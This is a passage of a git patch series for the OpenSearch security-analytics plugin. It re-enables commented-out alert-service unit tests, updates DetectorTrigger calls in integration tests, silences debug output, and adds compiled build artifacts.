ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), -// Instant.now(), -// Instant.now(), -// Monitor.MonitorType.DOC_LEVEL_MONITOR, -// null, -// 1, -// List.of(), -// List.of(), -// Map.of(), -// new DataSources(), -// TransportIndexDetectorAction.PLUGIN_OWNER_FIELD -// ), -// new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), -// List.of("finding_id_1"), -// List.of("docId1"), -// Instant.now(), -// Instant.now(), -// Alert.State.COMPLETED, -// null, -// List.of(), -// List.of(), -// 3, -// null, -// null -// ); + Alert alert2 = new Alert( + "alert_id_1", + new Monitor( + "monitor_id_1", + -3, + "monitor_name", + true, + new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), + Instant.now(), + Instant.now(), + Monitor.MonitorType.DOC_LEVEL_MONITOR, + null, + 1, + List.of(), + List.of(), + Map.of(), + new DataSources(), + TransportIndexDetectorAction.PLUGIN_OWNER_FIELD + ), + new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), + List.of("finding_id_1"), + List.of("docId1"), + Instant.now(), + Instant.now(), + Alert.State.COMPLETED, + null, + List.of(), + List.of(), + 3, + null, + null + ); -// GetAlertsResponse getAlertsResponse = new GetAlertsResponse( -// List.of(new AlertDto( -// detector.getId(), -// alert1.getId(), -// alert1.getVersion(), -// alert1.getSchemaVersion(), -// alert1.getTriggerId(), -// alert1.getTriggerName(), -// alert1.getFindingIds(), -// alert1.getRelatedDocIds(), -// alert1.getState(), -// alert1.getStartTime(), -// alert1.getEndTime(), -// alert1.getLastNotificationTime(), -// alert1.getAcknowledgedTime(), -// alert1.getErrorMessage(), -// alert1.getErrorHistory(), -// alert1.getSeverity(), -// alert1.getActionExecutionResults(), -// alert1.getAggregationResultBucket() -// ), -// new AlertDto( -// detector.getId(), -// alert2.getId(), -// alert2.getVersion(), -// alert2.getSchemaVersion(), -// alert2.getTriggerId(), -// alert2.getTriggerName(), -// alert2.getFindingIds(), -// alert2.getRelatedDocIds(), -// alert2.getState(), -// alert2.getStartTime(), -// alert2.getEndTime(), -// alert2.getLastNotificationTime(), -// alert2.getAcknowledgedTime(), -// alert2.getErrorMessage(), -// alert2.getErrorHistory(), -// alert2.getSeverity(), -// alert2.getActionExecutionResults(), -// alert2.getAggregationResultBucket() -// ) -// ), 2 -// ); + GetAlertsResponse getAlertsResponse = new GetAlertsResponse( + List.of(new AlertDto( + detector.getId(), + alert1.getId(), + alert1.getVersion(), + alert1.getSchemaVersion(), + alert1.getTriggerId(), + alert1.getTriggerName(), + alert1.getFindingIds(), + alert1.getRelatedDocIds(), + alert1.getState(), + alert1.getStartTime(), + alert1.getEndTime(), + alert1.getLastNotificationTime(), + alert1.getAcknowledgedTime(), + alert1.getErrorMessage(), + alert1.getErrorHistory(), + alert1.getSeverity(), + alert1.getActionExecutionResults(), + alert1.getAggregationResultBucket() + ), + new AlertDto( + detector.getId(), + alert2.getId(), + alert2.getVersion(), + alert2.getSchemaVersion(), + alert2.getTriggerId(), + alert2.getTriggerName(), + alert2.getFindingIds(), + alert2.getRelatedDocIds(), + alert2.getState(), + alert2.getStartTime(), + alert2.getEndTime(), + alert2.getLastNotificationTime(), + alert2.getAcknowledgedTime(), + alert2.getErrorMessage(), + alert2.getErrorHistory(), + alert2.getSeverity(), + alert2.getActionExecutionResults(), + alert2.getAggregationResultBucket() + ) + ), 2 + ); -// doAnswer(invocation -> { -// ActionListener l = invocation.getArgument(6); -// l.onResponse(getAlertsResponse); -// return null; -// }).when(alertssService).getAlertsByMonitorIds(any(), any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); + doAnswer(invocation -> { + ActionListener l = invocation.getArgument(6); + l.onResponse(getAlertsResponse); + return null; + }).when(alertssService).getAlertsByMonitorIds(any(), any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); -// // Call getFindingsByDetectorId -// Table table = new Table( -// "asc", -// "id", -// null, -// 100, -// 0, -// null -// ); -// alertssService.getAlertsByDetectorId("detector_id123", new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { -// @Override -// public void onResponse(GetAlertsResponse getAlertsResponse) { -// assertEquals(2, (int)getAlertsResponse.getTotalAlerts()); -// assertEquals(2, getAlertsResponse.getAlerts().size()); -// } + // Call getFindingsByDetectorId + Table table = new Table( + "asc", + "id", + null, + 100, + 0, + null + ); + alertssService.getAlertsByDetectorId("detector_id123", new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { + @Override + public void onResponse(GetAlertsResponse getAlertsResponse) { + assertEquals(2, (int)getAlertsResponse.getTotalAlerts()); + assertEquals(2, getAlertsResponse.getAlerts().size()); + } -// @Override -// public void onFailure(Exception e) { + @Override + public void onFailure(Exception e) { -// } -// }); -// } + } + }); + } -// public void testGetFindings_getFindingsByMonitorIdFailures() { + public void testGetFindings_getFindingsByMonitorIdFailures() { -<<<<<<< HEAD AlertsService alertssService = spy(AlertsService.class); Client client = mock(Client.class); alertssService.setIndicesAdminClient(client); @@ -279,103 +248,74 @@ >>>>>>> f620c37 (OSCI - Debugging) false ); GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); -======= -// AlertsService alertssService = spy(AlertsService.class); -// Client client = mock(Client.class); -// alertssService.setIndicesAdminClient(client); -// // Create fake GetDetectorResponse -// Detector detector = new Detector( -// "detector_id123", -// 0L, -// "test-monitor", -// true, -// new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), -// Instant.now(), -// Instant.now(), -// "others_application", -// null, -// List.of(), -// List.of(), -// List.of("monitor_id1", "monitor_id2"), -// DetectorMonitorConfig.getRuleIndex("others_application"), -// null, -// DetectorMonitorConfig.getAlertsIndex("others_application"), -// null, -// null, -// DetectorMonitorConfig.getFindingsIndex("others_application"), -// Collections.emptyMap(), -// Collections.emptyList() -// ); -// GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); ->>>>>>> f620c37 (OSCI - Debugging) -// // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse -// doAnswer(invocation -> { -// ActionListener l = invocation.getArgument(2); -// l.onResponse(getDetectorResponse); -// return null; -// }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); + // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse + doAnswer(invocation -> { + ActionListener l = invocation.getArgument(2); + l.onResponse(getDetectorResponse); + return null; + }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); -// doAnswer(invocation -> { -// ActionListener l = invocation.getArgument(6); -// l.onFailure(new IllegalArgumentException("Error getting findings")); -// return null; -// }).when(alertssService).getAlertsByMonitorIds(any(), any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); + doAnswer(invocation -> { + ActionListener l = invocation.getArgument(6); + l.onFailure(new IllegalArgumentException("Error getting findings")); + return null; + }).when(alertssService).getAlertsByMonitorIds(any(), any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); -// // Call getFindingsByDetectorId -// Table table = new Table( -// "asc", -// "id", -// null, -// 100, -// 0, -// null -// ); -// alertssService.getAlertsByDetectorId("detector_id123",new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { -// @Override -// public void onResponse(GetAlertsResponse getAlertsResponse) { -// fail("this test should've failed"); -// } + // Call getFindingsByDetectorId + Table table = new Table( + "asc", + "id", + null, + 100, + 0, + null + ); + alertssService.getAlertsByDetectorId("detector_id123",new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { + @Override + public void onResponse(GetAlertsResponse getAlertsResponse) { + fail("this test should've failed"); + } -// @Override -// public void onFailure(Exception e) { -// assertTrue(e.getMessage().contains("Error getting findings")); -// } -// }); -// } + @Override + public void onFailure(Exception e) { + assertTrue(e.getMessage().contains("Error getting findings")); + } + }); + } -// public void testGetFindings_getDetectorFailure() { + public void testGetFindings_getDetectorFailure() { -// AlertsService alertssService = spy(AlertsService.class); -// Client client = mock(Client.class); -// alertssService.setIndicesAdminClient(client); + AlertsService alertssService = spy(AlertsService.class); + Client client = mock(Client.class); + alertssService.setIndicesAdminClient(client); -// // Setup getDetector interceptor and return fake expcetion by calling onFailure -// doAnswer(invocation -> { -// ActionListener l = invocation.getArgument(2); -// l.onFailure(new IllegalArgumentException("GetDetector failed")); -// return null; -// }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); + // Setup getDetector interceptor and return fake expcetion by calling onFailure + doAnswer(invocation -> { + ActionListener l = invocation.getArgument(2); + l.onFailure(new IllegalArgumentException("GetDetector failed")); + return null; + }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); -// // Call getFindingsByDetectorId -// Table table = new Table( -// "asc", -// "id", -// null, -// 100, -// 0, -// null -// ); -// alertssService.getAlertsByDetectorId("detector_id123", new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { -// @Override -// public void onResponse(GetAlertsResponse getAlertsResponse) { -// fail("this test should've failed"); -// } + // Call getFindingsByDetectorId + Table table = new Table( + "asc", + "id", + null, + 100, + 0, + null + ); + alertssService.getAlertsByDetectorId("detector_id123", new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { + @Override + public void onResponse(GetAlertsResponse getAlertsResponse) { + fail("this test should've failed"); + } -// @Override -// public void onFailure(Exception e) { -// assertTrue(e.getMessage().contains("GetDetector failed")); -// } -// }); -// } -// } \ No newline at end of file + @Override + public void onFailure(Exception e) { + assertTrue(e.getMessage().contains("GetDetector failed")); + } + }); + } +} \ No newline at end of file diff --git a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java index c6665616d..816995da5 100644 --- a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java +++ b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java @@ -40,9 +40,11 @@ import static org.opensearch.securityanalytics.TestHelpers.netFlowMappings; import static org.opensearch.securityanalytics.TestHelpers.randomAction; import static org.opensearch.securityanalytics.TestHelpers.randomDetectorType; +// import static org.opensearch.securityanalytics.TestHelpers.randomDetectorWithInputsAndThreatIntel; import static org.opensearch.securityanalytics.TestHelpers.randomDetectorWithInputsAndTriggers; import static org.opensearch.securityanalytics.TestHelpers.randomDetectorWithTriggers; import static org.opensearch.securityanalytics.TestHelpers.randomDoc; +// import static org.opensearch.securityanalytics.TestHelpers.randomDocWithIpIoc; import static org.opensearch.securityanalytics.TestHelpers.randomIndex; import static org.opensearch.securityanalytics.TestHelpers.randomRule; import static org.opensearch.securityanalytics.TestHelpers.windowsIndexMapping; @@ -86,7 +88,7 @@ public void testGetAlerts_success() throws IOException { Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(new DetectorRule(createdId)), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger("", "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); + List.of(new DetectorTrigger("", "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -202,7 +204,7 @@ public void testGetAlertsByFindingIds() throws IOException { Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(new DetectorRule(createdId)), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger("", "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); + List.of(new DetectorTrigger("", "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -294,9 +296,15 @@ public void testGetAlertsByFindingIds() throws IOException { params.clear(); params.put("detector_id", createdId); - System.out.println("size of getFindings:" + getFindingsBody.get("findings").size()); - Map firstFinding = (Map) getFindingsBody.get("findings").get(0); + List> findingsList = (List>) getFindingsBody.get("findings"); + + + System.out.println("size of getFindings:" + findingsList.size()); + + Map firstFinding = findingsList.get(0); + Object findingsId = firstFinding.get("id"); + System.out.println("---------------------------------------------------------------------------------------------------------"); System.out.println("The findings id is: " + findingsId.toString()); System.out.println("---------------------------------------------------------------------------------------------------------"); @@ -363,13 +371,13 @@ public void testAckAlerts_WithInvalidDetectorAlertsCombination() throws IOExcept Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); + List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Detector detector1 = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); + List.of(new DetectorTrigger("", "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); Response createResponse1 = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector1)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -470,7 +478,7 @@ public void testAckAlertsWithInvalidDetector() throws IOException { Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(new DetectorRule(createdId)), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); + List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -578,7 +586,7 @@ public void testGetAlerts_byDetectorType_success() throws IOException, Interrupt Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -657,7 +665,7 @@ public void testGetAlerts_byDetectorType_multipleDetectors_success() throws IOEx Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); // Detector 1 - WINDOWS - Detector detector1 = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); + Detector detector1 = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector1)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -680,7 +688,7 @@ public void testGetAlerts_byDetectorType_multipleDetectors_success() throws IOEx getPrePackagedRules("network").stream().map(DetectorRule::new).collect(Collectors.toList())); Detector detector2 = randomDetectorWithTriggers( getPrePackagedRules("network"), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of("network"), List.of(), List.of(), List.of(), List.of())), + List.of(new DetectorTrigger("", "test-trigger", "1", List.of("network"), List.of(), List.of(), List.of(), List.of(), List.of())), "network", inputNetflow ); @@ -772,7 +780,7 @@ public void testAlertHistoryRollover_maxAge() throws IOException, InterruptedExc Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger("", "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -842,7 +850,7 @@ public void testAlertHistoryRollover_maxAge_low_retention() throws IOException, Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger("", "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -921,7 +929,7 @@ public void testAlertHistoryRollover_maxDocs() throws IOException, InterruptedEx Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger("", "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(),List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -1004,7 +1012,7 @@ public void testGetAlertsFromAllIndices() throws IOException, InterruptedExcepti Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(),List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); From f7662f680e8f2bb38d2c6a078e79b3d0bdca9fd0 Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Thu, 30 Nov 2023 20:47:21 -0500 Subject: [PATCH 08/11] Fixed HTTP call Signed-off-by: Ishan Bhat --- .../securityanalytics/alerts/AlertsIT.java | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java index 816995da5..49bb19128 100644 --- a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java +++ b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java @@ -277,19 +277,19 @@ public void testGetAlertsByFindingIds() throws IOException { // print the contents of a java map - System.out.println("Printing the contents of the alerts map: -------------------------------------------------------------------------"); + // System.out.println("Printing the contents of the alerts map: -------------------------------------------------------------------------"); - if (!getFindingsBody.isEmpty()) { - Iterator> it = getFindingsBody.entrySet().iterator(); - while (it.hasNext()) { - Map.Entry obj = it.next(); - System.out.println(obj.getValue() + "Key: " + obj.getKey()); - } - } + // if (!getFindingsBody.isEmpty()) { + // Iterator> it = getFindingsBody.entrySet().iterator(); + // while (it.hasNext()) { + // Map.Entry obj = it.next(); + // System.out.println(obj.getValue() + "Key: " + obj.getKey()); + // } + // } - System.out.println("Finished prnting ----------------------------------------------------------------------------------------------------"); - System.out.println("The size of the hashmap is" + getFindingsBody.size()); - System.out.println("------------------------------------------------------------------------------------------------------"); + // System.out.println("Finished prnting ----------------------------------------------------------------------------------------------------"); + // System.out.println("The size of the hashmap is" + getFindingsBody.size()); + // System.out.println("------------------------------------------------------------------------------------------------------"); // Call GetAlerts API @@ -305,20 +305,19 @@ public void testGetAlertsByFindingIds() throws IOException { Object findingsId = firstFinding.get("id"); - System.out.println("---------------------------------------------------------------------------------------------------------"); - System.out.println("The findings id is: " + findingsId.toString()); - System.out.println("---------------------------------------------------------------------------------------------------------"); - params.put("findingsId", findingsId.toString()); + // System.out.println("---------------------------------------------------------------------------------------------------------"); + // System.out.println("The findings id is: " + findingsId.toString()); + // System.out.println("---------------------------------------------------------------------------------------------------------"); + // params.put("findingId", findingsId.toString()); Response getAlertsResponse = makeRequest(client(), "GET", SecurityAnalyticsPlugin.ALERTS_BASE_URI, params, null); Map getAlertsBody = asMap(getAlertsResponse); // TODO enable asserts here when able - Assert.assertEquals(2, getAlertsBody.get("total_alerts")); + Assert.assertEquals(1, getAlertsBody.get("total_alerts")); // Write the continuation of this test case - String alertId = (String) ((ArrayList>) getAlertsBody.get("alerts")).get(0).get("id"); String detectorId = (String) ((ArrayList>) getAlertsBody.get("alerts")).get(0).get("detector_id"); params = new HashMap<>(); From 89a409aa62f397c01be202f68c87272c1bb9e826 Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Thu, 30 Nov 2023 21:09:09 -0500 Subject: [PATCH 09/11] Changed HTTP error Signed-off-by: Ishan Bhat --- .../services/org.apache.lucene.codecs.Codec | 1 + ...rch.jobscheduler.spi.JobSchedulerExtension | 1 + bin/main/OSMapping/ad_ldap_logtype.json | 100 + bin/main/OSMapping/apache_access_logtype.json | 7 + bin/main/OSMapping/azure_logtype.json | 216 + bin/main/OSMapping/cloudtrail_logtype.json | 230 + bin/main/OSMapping/dns_logtype.json | 125 + bin/main/OSMapping/github_logtype.json | 12 + bin/main/OSMapping/gworkspace_logtype.json | 20 + bin/main/OSMapping/linux_logtype.json | 64 + bin/main/OSMapping/logtypes.json | 209 + bin/main/OSMapping/m365_logtype.json | 24 + bin/main/OSMapping/netflow_logtype.json | 44 + bin/main/OSMapping/network_logtype.json | 144 + bin/main/OSMapping/okta_logtype.json | 16 + .../OSMapping/others_application_logtype.json | 24 + bin/main/OSMapping/others_apt_logtype.json | 24 + bin/main/OSMapping/others_cloud_logtype.json | 24 + .../OSMapping/others_compliance_logtype.json | 24 + bin/main/OSMapping/others_macos_logtype.json | 24 + bin/main/OSMapping/others_proxy_logtype.json | 24 + bin/main/OSMapping/others_web_logtype.json | 24 + bin/main/OSMapping/s3_logtype.json | 20 + bin/main/OSMapping/test_windows_logtype.json | 53 + bin/main/OSMapping/vpcflow_logtype.json | 141 + bin/main/OSMapping/waf_logtype.json | 56 + bin/main/OSMapping/windows_logtype.json | 841 ++ bin/main/correlations/mitre_correlation.json | 9625 +++++++++++++++++ bin/main/mappings/alert_mapping.json | 157 + bin/main/mappings/correlation-rules.json | 52 + bin/main/mappings/correlation.json | 51 + bin/main/mappings/detector-settings.json | 22 + bin/main/mappings/detectors.json | 180 + bin/main/mappings/finding_mapping.json | 68 + .../mappings/log_type_config_mapping.json | 80 + bin/main/mappings/rules.json | 124 + .../mappings/threat_intel_feed_mapping.json | 27 + .../mappings/threat_intel_job_mapping.json | 62 + .../SecurityAnalyticsPlugin$1.class | Bin 0 -> 1575 bytes .../SecurityAnalyticsPlugin.class | Bin 0 -> 30526 bytes .../action/AckAlertsAction.class | Bin 0 -> 1762 bytes .../action/AckAlertsRequest.class | Bin 0 -> 3662 bytes .../action/AckAlertsResponse.class | Bin 0 -> 4089 bytes .../securityanalytics/action/AlertDto.class | Bin 0 -> 11437 bytes .../action/CorrelatedFindingAction.class | Bin 0 -> 1825 bytes .../action/CorrelatedFindingRequest.class | Bin 0 -> 1975 bytes .../action/CorrelatedFindingResponse.class | Bin 0 -> 3347 bytes .../action/CreateIndexMappingsAction.class | Bin 0 -> 1796 bytes .../action/CreateIndexMappingsRequest.class | Bin 0 -> 8118 bytes .../action/DeleteCorrelationRuleAction.class | Bin 0 -> 1793 bytes .../action/DeleteCorrelationRuleRequest.class | Bin 0 -> 2544 bytes .../action/DeleteCustomLogTypeAction.class | Bin 0 -> 1830 bytes .../action/DeleteCustomLogTypeRequest.class | Bin 0 -> 2013 bytes .../action/DeleteCustomLogTypeResponse.class | Bin 0 -> 2624 bytes .../action/DeleteDetectorAction.class | Bin 0 -> 1801 bytes .../action/DeleteDetectorRequest.class | Bin 0 -> 2000 bytes .../action/DeleteDetectorResponse.class | Bin 0 -> 2674 bytes .../action/DeleteRuleAction.class | Bin 0 -> 1773 bytes .../action/DeleteRuleRequest.class | Bin 0 -> 2344 bytes .../action/DeleteRuleResponse.class | Bin 0 -> 2593 bytes .../securityanalytics/action/FindingDto.class | Bin 0 -> 5924 bytes .../action/GetAlertsAction.class | Bin 0 -> 1766 bytes .../action/GetAlertsRequest.class | Bin 0 -> 4121 bytes .../action/GetAlertsResponse.class | Bin 0 -> 4016 bytes .../action/GetAllRuleCategoriesAction.class | Bin 0 -> 1838 bytes .../action/GetAllRuleCategoriesRequest.class | Bin 0 -> 986 bytes .../action/GetAllRuleCategoriesResponse.class | Bin 0 -> 3581 bytes .../action/GetDetectorAction.class | Bin 0 -> 1780 bytes .../action/GetDetectorRequest.class | Bin 0 -> 2458 bytes .../action/GetDetectorResponse.class | Bin 0 -> 4734 bytes .../action/GetFindingsAction.class | Bin 0 -> 1780 bytes .../action/GetFindingsRequest.class | Bin 0 -> 2911 bytes .../action/GetFindingsResponse.class | Bin 0 -> 3974 bytes .../action/GetIndexMappingsAction.class | Bin 0 -> 1805 bytes .../action/GetIndexMappingsRequest.class | Bin 0 -> 3558 bytes .../action/GetIndexMappingsResponse.class | Bin 0 -> 6488 bytes .../action/GetMappingsViewAction.class | Bin 0 -> 1804 bytes .../action/GetMappingsViewRequest.class | Bin 0 -> 3981 bytes .../action/GetMappingsViewResponse.class | Bin 0 -> 7102 bytes .../action/IndexCorrelationRuleAction.class | Bin 0 -> 1823 bytes .../action/IndexCorrelationRuleRequest.class | Bin 0 -> 2972 bytes .../action/IndexCorrelationRuleResponse.class | Bin 0 -> 3446 bytes .../action/IndexCustomLogTypeAction.class | Bin 0 -> 1823 bytes .../action/IndexCustomLogTypeRequest.class | Bin 0 -> 3832 bytes .../action/IndexCustomLogTypeResponse.class | Bin 0 -> 3334 bytes .../action/IndexDetectorAction.class | Bin 0 -> 1794 bytes .../action/IndexDetectorRequest.class | Bin 0 -> 2941 bytes .../action/IndexDetectorResponse.class | Bin 0 -> 4584 bytes .../action/IndexRuleAction.class | Bin 0 -> 1766 bytes .../action/IndexRuleRequest.class | Bin 0 -> 3766 bytes .../action/IndexRuleResponse.class | Bin 0 -> 4017 bytes .../action/ListCorrelationsAction.class | Bin 0 -> 1815 bytes .../action/ListCorrelationsRequest.class | Bin 0 -> 1624 bytes .../action/ListCorrelationsResponse.class | Bin 0 -> 3369 bytes .../action/SearchCorrelationRuleAction.class | Bin 0 -> 1773 bytes .../action/SearchCorrelationRuleRequest.class | Bin 0 -> 1361 bytes .../action/SearchCustomLogTypeAction.class | Bin 0 -> 1758 bytes .../action/SearchCustomLogTypeRequest.class | Bin 0 -> 1344 bytes .../action/SearchDetectorAction.class | Bin 0 -> 1744 bytes .../action/SearchDetectorRequest.class 